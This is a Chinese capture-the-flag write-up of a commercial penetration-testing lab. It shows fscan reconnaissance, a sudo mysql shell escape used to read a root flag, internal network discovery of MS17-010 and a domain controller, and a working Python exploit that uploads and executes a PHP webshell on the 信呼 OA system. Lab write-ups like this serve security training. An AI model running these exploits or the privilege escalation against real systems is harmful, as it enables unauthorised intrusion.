记一次渗透测试

initial-春秋云镜 年轻人的第一次复现加钟

fscan -h 39.100.182.178

output

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.4
start infoscan
39.100.182.178:22 open
39.100.182.178:80 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle http://39.100.182.178     code:200 len:5578   title:Bootstrap Material Admin
[+] PocScan http://39.100.182.178 poc-yaml-thinkphp5023-method-rce poc1
已完成 2/2
[*] 扫描结束,耗时: 49.1042431s

(**www-data**:/var/www/html) $ cd /

(**www-data**:/) $ whoami

www-data

(**www-data**:/) $ ifconfig

eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500

​    inet 172.22.1.15 netmask 255.255.0.0 broadcast 172.22.255.255

​    inet6 fe80::216:3eff:fe33:75f1 prefixlen 64 scopeid 0x20<link>

​    ether 00:16:3e:33:75:f1 txqueuelen 1000 (Ethernet)

​    RX packets 87408 bytes 120749685 (120.7 MB)

​    RX errors 0 dropped 0 overruns 0 frame 0

​    TX packets 18778 bytes 2965575 (2.9 MB)

​    TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536

​    inet 127.0.0.1 netmask 255.0.0.0

​    inet6 ::1 prefixlen 128 scopeid 0x10<host>

​    loop txqueuelen 1000 (Local Loopback)

​    RX packets 586 bytes 52939 (52.9 KB)

​    RX errors 0 dropped 0 overruns 0 frame 0

​    TX packets 586 bytes 52939 (52.9 KB)

(www-data:/) $ sudo -l
Matching Defaults entries for www-data on ubuntu-web01:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on ubuntu-web01:
    (root) NOPASSWD: /usr/bin/mysql

User www-data may run the following commands on ubuntu-web01:
    (root) NOPASSWD: /usr/bin/mysql
(www-data:/) $ mysql -e '\! cat /root/flag/'
ERROR 1045 (28000): Access denied for user 'www-data'@'localhost' (using password: NO)
(www-data:/) $ sudo mysql -e '\! /bin/sh'
(www-data:/) $ mysql -e '\! cat /root/flag/'
ERROR 1045 (28000): Access denied for user 'www-data'@'localhost' (using password: NO)
(www-data:/) $ mysql -e '\! cat /root/flag/f*'
ERROR 1045 (28000): Access denied for user 'www-data'@'localhost' (using password: NO)
(www-data:/) $ sudo mysql -e '\! find / -name flag*'
(www-data:/) $ sudo mysql -e '\! find / -name flag* | tee 1.txt'
/proc/sys/kernel/sched_domain/cpu0/domain0/flags
/proc/sys/kernel/sched_domain/cpu1/domain0/flags
/sys/kernel/debug/block/vda/hctx0/flags
/sys/kernel/debug/block/loop7/hctx0/flags
/sys/kernel/debug/block/loop6/hctx0/flags
/sys/kernel/debug/block/loop5/hctx0/flags
/sys/kernel/debug/block/loop4/hctx0/flags
/sys/kernel/debug/block/loop3/hctx0/flags
/sys/kernel/debug/block/loop2/hctx0/flags
/sys/kernel/debug/block/loop1/hctx0/flags
/sys/kernel/debug/block/loop0/hctx0/flags
/sys/devices/pnp0/00:04/tty/ttyS0/flags
/sys/devices/platform/serial8250/tty/ttyS15/flags
/sys/devices/platform/serial8250/tty/ttyS6/flags
/sys/devices/platform/serial8250/tty/ttyS23/flags
/sys/devices/platform/serial8250/tty/ttyS13/flags
/sys/devices/platform/serial8250/tty/ttyS31/flags
/sys/devices/platform/serial8250/tty/ttyS4/flags
/sys/devices/platform/serial8250/tty/ttyS21/flags
/sys/devices/platform/serial8250/tty/ttyS11/flags
/sys/devices/platform/serial8250/tty/ttyS2/flags
/sys/devices/platform/serial8250/tty/ttyS28/flags
/sys/devices/platform/serial8250/tty/ttyS18/flags
/sys/devices/platform/serial8250/tty/ttyS9/flags
/sys/devices/platform/serial8250/tty/ttyS26/flags
/sys/devices/platform/serial8250/tty/ttyS16/flags
/sys/devices/platform/serial8250/tty/ttyS7/flags
/sys/devices/platform/serial8250/tty/ttyS24/flags
/sys/devices/platform/serial8250/tty/ttyS14/flags
/sys/devices/platform/serial8250/tty/ttyS5/flags
/sys/devices/platform/serial8250/tty/ttyS22/flags
/sys/devices/platform/serial8250/tty/ttyS12/flags
/sys/devices/platform/serial8250/tty/ttyS30/flags
/sys/devices/platform/serial8250/tty/ttyS3/flags
/sys/devices/platform/serial8250/tty/ttyS20/flags
/sys/devices/platform/serial8250/tty/ttyS10/flags
/sys/devices/platform/serial8250/tty/ttyS29/flags
/sys/devices/platform/serial8250/tty/ttyS1/flags
/sys/devices/platform/serial8250/tty/ttyS19/flags
/sys/devices/platform/serial8250/tty/ttyS27/flags
/sys/devices/platform/serial8250/tty/ttyS17/flags
/sys/devices/platform/serial8250/tty/ttyS8/flags
/sys/devices/platform/serial8250/tty/ttyS25/flags
/sys/devices/pci0000:00/0000:00:05.0/virtio2/net/eth0/flags
/sys/devices/virtual/net/lo/flags
/root/flag
/root/flag/flag01.txt
/usr/src/linux-headers-5.4.0-26-generic/include/config/arch/uses/high/vma/flags.h
/usr/src/linux-headers-5.4.0-110/scripts/coccinelle/locks/flags.cocci
/usr/src/linux-headers-5.4.0-110-generic/include/config/arch/uses/high/vma/flags.h
/usr/src/linux-headers-5.4.0-26/scripts/coccinelle/locks/flags.cocci
(www-data:/) $ mysql -e '\! cat /root/flag/flag01.txt'
ERROR 1045 (28000): Access denied for user 'www-data'@'localhost' (using password: NO)
(www-data:/) $ mysql -e '\! tac /root/flag/flag01.txt'
ERROR 1045 (28000): Access denied for user 'www-data'@'localhost' (using password: NO)

(**www-data**:/) $ sudo mysql -e '\! cat /root/flag/flag01.txt'

 ██   ██ ██   ██    ███████  ███████    ██   ████   ██  ████████ 

░░██  ██ ░██  ████   ██░░░░░██ ░██░░░░██   ████  ░██░██  ░██ ██░░░░░░██

 ░░██ ██ ░██  ██░░██  ██   ░░██░██  ░██  ██░░██ ░██░░██ ░██ ██   ░░ 

 ░░███  ░██ ██ ░░██ ░██   ░██░███████  ██ ░░██ ░██ ░░██ ░██░██     

  ██░██ ░██ ██████████░██   ░██░██░░░██  ██████████░██ ░░██░██░██  █████

 ██ ░░██ ░██░██░░░░░░██░░██   ██ ░██ ░░██ ░██░░░░░░██░██  ░░████░░██ ░░░░██

 ██  ░░██░██░██   ░██ ░░███████ ░██  ░░██░██   ░██░██  ░░███ ░░████████ 

░░   ░░ ░░ ░░   ░░  ░░░░░░░  ░░   ░░ ░░   ░░ ░░   ░░░  ░░░░░░░░ 

Congratulations!!! You found the first flag, the next flag may be in a server in the internal network.

flag01: flag{60b53231-

(www-data:/var/www/html) $ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.22.1.15  netmask 255.255.0.0  broadcast 172.22.255.255
        inet6 fe80::216:3eff:fe33:75f1  prefixlen 64  scopeid 0x20<link>
        ether 00:16:3e:33:75:f1  txqueuelen 1000  (Ethernet)
        RX packets 133458  bytes 181467498 (181.4 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 29109  bytes 5207262 (5.2 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 1314  bytes 115371 (115.3 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1314  bytes 115371 (115.3 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

(www-data:/tmp/diver) $ ./fscan -h 172.22.1.15/24 | tee 1.txt
(www-data:/tmp/diver) $ cat 1.txt
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.1.2      is alive
(icmp) Target 172.22.1.15     is alive
(icmp) Target 172.22.1.18     is alive
(icmp) Target 172.22.1.21     is alive
[*] Icmp alive hosts len is: 4
172.22.1.18:3306 open
172.22.1.21:445 open
172.22.1.18:445 open
172.22.1.2:445 open
172.22.1.18:139 open
172.22.1.21:139 open
172.22.1.2:139 open
172.22.1.21:135 open
172.22.1.18:135 open
172.22.1.2:135 open
172.22.1.18:80 open
172.22.1.15:80 open
172.22.1.15:22 open
172.22.1.2:88 open
[*] alive ports len is: 14
start vulscan
[*] NetInfo 
[*]172.22.1.18
   [->]XIAORANG-OA01
   [->]172.22.1.18
[*] NetInfo 
[*]172.22.1.2
   [->]DC01
   [->]172.22.1.2
[*] NetInfo 
[*]172.22.1.21
   [->]XIAORANG-WIN7
   [->]172.22.1.21
[*] OsInfo 172.22.1.2    (Windows Server 2016 Datacenter 14393)
[*] WebTitle http://172.22.1.15        code:200 len:5578   title:Bootstrap Material Admin
[+] MS17-010 172.22.1.21    (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] NetBios 172.22.1.21     XIAORANG-WIN7.xiaorang.lab          Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[*] NetBios 172.22.1.2      [+] DC:DC01.xiaorang.lab             Windows Server 2016 Datacenter 14393
[*] NetBios 172.22.1.18     XIAORANG-OA01.xiaorang.lab          Windows Server 2012 R2 Datacenter 9600
[*] WebTitle http://172.22.1.18        code:302 len:0      title:None 跳转url: http://172.22.1.18?m=login
[*] WebTitle http://172.22.1.18?m=login code:200 len:4012   title:信呼协同办公系统
[+] PocScan http://172.22.1.15 poc-yaml-thinkphp5023-method-rce poc1
已完成 14/14
[*] 扫描结束,耗时: 11.007523554s

—————————————————————————————————————————————

后面的段很玄学了，即使我开了代理也存在代理机非常不稳定，即使test绿了连接不上，最后一下总算过了，之后再复现。。。

import requests
session = requests.session()
url_pre = 'http://url/'//改地址
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'
data1 = {
    'rempass': '0',
    'jmpass': 'false',
    'device': '1625884034525',
    'ltype': '0',
    'adminuser': 'dGVzdA::', //改用户
    'adminpass': 'YWJjMTIz',//改密码
    'yanzm': ''
}
r = session.post(url1, data=data1)
r = session.post(url2, files={'file': open('1.php', 'r+')})
filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
id = r.json()['id']
url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'
r = session.get(url3)
r = session.get(url_pre + filepath + "?1=system('whoami');")
print(r.text)

直接蚂蚁剑打。。。第二段

第三段其实在蚁剑上fscan有了。。。

好贵好贵，3沙砾首充15，因为靶机不稳定复现了很久。。。第一段可不反弹shell，直接提权。。。